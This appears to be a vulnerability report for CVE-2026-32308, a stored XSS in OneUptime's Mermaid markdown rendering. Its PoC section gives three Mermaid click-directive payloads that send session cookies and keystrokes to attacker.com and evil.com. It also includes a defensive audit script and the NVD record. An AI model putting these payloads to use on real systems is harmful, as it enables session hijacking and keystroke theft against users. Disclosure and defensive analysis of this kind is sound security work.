Security Vulnerability Report
CVE-2026-32308 CVSS 7.6 HIGH

Published: 2026-03-13 19:54:42
Last Modified: 2026-03-17 20:08:07

Description

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.

CVSS Details

CVSS Score: 7.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
(Attack Vector: Network; Attack Complexity: Low; Privileges Required: Low; User Interaction: Required; Scope: Changed; Confidentiality: High; Integrity: Low; Availability: None)
Exploitability Score: 2.3; Impact Score: 4.7
Weakness: CWE-79 (Cross-site Scripting)

Configurations (Affected Products)

cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* - VULNERABLE
OneUptime < 10.0.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2026-32308 PoC - OneUptime Mermaid XSS
// Attack vector: Insert malicious Mermaid code in any Markdown field
const maliciousMermaid = `
graph TD
  A["Click me for more info"] --> B["Processing..."]
  click A "javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)"
  style A fill:#f00,color:#fff
`;

// XSS Payload for stealing session cookies
const xssPayload = `
graph TD
  A["Incident Report"] --> B["Click to view details"]
  click B "javascript:document.location='https://evil.com/log?c='+document.cookie"
`;

// Alternative payload - Keylogger
const keyloggerPayload = `
sequenceDiagram
  participant U as User
  participant A as Attacker
  U->>A: Click to continue
  click U "javascript:document.onkeypress=function(e){fetch('https://attacker.com/k?'+e.key)}"
`;

// The PoC demonstrates that any Mermaid click directive with javascript: prefix
// will execute arbitrary JavaScript when the user clicks on the node.
// This works because OneUptime renders Mermaid with securityLevel: "loose"
// and injects the SVG via innerHTML without sanitization.
```
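Defender-side view of the same mechanism, as an added example that is not OneUptime's code: the weak Mermaid setting the advisory names beside the hardened one, plus a pre-render audit that flags the `click` directive and `javascript:` URLs in every fenced Mermaid block of a markdown field. Mermaid itself is not loaded; the configuration objects, the helper names and the sample field are assumptions made for this example.

```javascript
// Added example, not OneUptime's code: weak vs. hardened Mermaid setting plus a pre-render audit.

// "loose" enables click bindings and raw HTML in labels; "strict" (Mermaid's
// default) disables click functionality and encodes HTML in labels.
const VULNERABLE_MERMAID_CONFIG = { startOnLoad: false, securityLevel: "loose" };
const HARDENED_MERMAID_CONFIG = { startOnLoad: false, securityLevel: "strict" };

// True only when the configuration cannot turn diagram text into an event binding.
function isSafeMermaidConfig(config) {
  return config.securityLevel === "strict";
}

const FENCE = "`".repeat(3); // built at runtime so no literal fence appears in this source

// Pull the body of every fenced mermaid block out of a markdown string.
function extractMermaidBlocks(markdown) {
  const re = new RegExp(FENCE + "mermaid[^\\n]*\\n([\\s\\S]*?)" + FENCE, "g");
  const blocks = [];
  let m;
  while ((m = re.exec(markdown)) !== null) blocks.push(m[1]);
  return blocks;
}

// Audit one diagram: flag each `click` directive (Mermaid's interactive event
// binding) and any javascript: URL, with its 1-based line number.
function auditMermaidSource(source) {
  const findings = [];
  source.split("\n").forEach((raw, i) => {
    const line = raw.trim();
    if (/^click\s+/i.test(line)) findings.push({ line: i + 1, reason: "click directive" });
    else if (/javascript\s*:/i.test(line)) findings.push({ line: i + 1, reason: "javascript: URL" });
  });
  return findings;
}

// Audit a whole markdown field (incident description, status page announcement,
// monitor note). One entry per diagram; empty findings means it may be rendered.
function auditMarkdownField(markdown) {
  return extractMermaidBlocks(markdown).map((src, block) => ({ block, findings: auditMermaidSource(src) }));
}

// Constructed sample field: one diagram carrying a click binding, one clean diagram.
const SAMPLE_FIELD = [
  "Incident summary", "", FENCE + "mermaid", "graph TD",
  '  A["Status"] --> B["Details"]', '  click A "javascript:alert(1)"', FENCE,
  "", FENCE + "mermaid", "graph LR", "  X --> Y", FENCE,
].join("\n");

console.log(JSON.stringify(auditMarkdownField(SAMPLE_FIELD), null, 2));
```

In the renderer, the strict setting should be paired with an SVG sanitizer before any innerHTML assignment, since the advisory states the SVG was injected unsanitized.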

References

https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh (Vendor Advisory; tagged Exploit, Mitigation)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-32308", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:42.147", "lastModified": "2026-03-17T20:08:07.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: \"loose\" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23."}, {"lang": "es", "value": "OneUptime es una solución para monitorear y gestionar servicios en línea. Antes de la versión 10.0.23, el componente visor de Markdown renderiza diagramas Mermaid con securityLevel: 'loose' e inyecta la salida SVG a través de innerHTML. Esta configuración permite explícitamente enlaces de eventos interactivos en los diagramas Mermaid, lo que habilita XSS a través de la directiva 'click' de Mermaid que puede ejecutar JavaScript arbitrario. Cualquier campo que renderice markdown (descripciones de incidentes, anuncios de páginas de estado, notas de monitores) es vulnerable. Esta vulnerabilidad se corrige en la versión 10.0.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.23", "matchCriteriaId": "AF2F89C2-1AB8-4611-9B0B-A4CFA02C807E"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```